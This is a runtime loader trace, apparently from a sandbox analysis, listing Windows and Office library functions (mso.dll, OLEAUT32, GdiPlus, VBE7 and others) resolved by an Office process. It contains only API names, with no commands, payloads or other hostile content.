DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: Comctl32.dll/
DynamicLoader: mso.dll/
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: GdiPlus.dll/GdiplusStartup
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat
DynamicLoader: GdiPlus.dll/GdipGetImageFlags
DynamicLoader: GdiPlus.dll/GdipGetImageWidth
DynamicLoader: GdiPlus.dll/GdipGetImageHeight
DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat
DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution
DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution
DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount
DynamicLoader: GdiPlus.dll/GdipDisposeImage
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetCharABCWidthsI
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePath
DynamicLoader: GdiPlus.dll/GdipStartPathFigure
DynamicLoader: GdiPlus.dll/GdipAddPathLine2
DynamicLoader: GdiPlus.dll/GdipClosePathFigure
DynamicLoader: GdiPlus.dll/GdipCreateMatrix2
DynamicLoader: GdiPlus.dll/GdipTransformPath
DynamicLoader: GdiPlus.dll/GdipDeleteMatrix
DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds
DynamicLoader: GdiPlus.dll/GdipCreatePathIter
DynamicLoader: GdiPlus.dll/GdipPathIterRewind
DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath
DynamicLoader: GdiPlus.dll/GdipPathIterCopyData
DynamicLoader: GdiPlus.dll/GdipDeletePathIter
DynamicLoader: GdiPlus.dll/GdipAddPathLine
DynamicLoader: GdiPlus.dll/GdipDeletePath
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/
DynamicLoader: VBE7.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoFDoSmartTagSecurityCheck@8
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiTransparentBlt
DynamicLoader: GDI32.dll/GdiAlphaBlend
DynamicLoader: GDI32.dll/GdiGradientFill
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateSolidFill
DynamicLoader: GdiPlus.dll/GdipCreateFromHDC
DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode
DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality
DynamicLoader: GdiPlus.dll/GdipSetPageUnit
DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipFillPath
DynamicLoader: GdiPlus.dll/GdipDeleteGraphics
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipClonePath
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathPolygon
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePen1
DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819
DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin
DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit
DynamicLoader: GdiPlus.dll/GdipClonePen
DynamicLoader: GdiPlus.dll/GdipSetPenStartCap
DynamicLoader: GdiPlus.dll/GdipSetPenEndCap
DynamicLoader: GdiPlus.dll/GdipDeletePen
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipTransformPoints
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics
DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext
DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes
DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode
DynamicLoader: GdiPlus.dll/GdipGetImageType
DynamicLoader: GdiPlus.dll/GdipGetImageBounds
DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes
DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap
DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
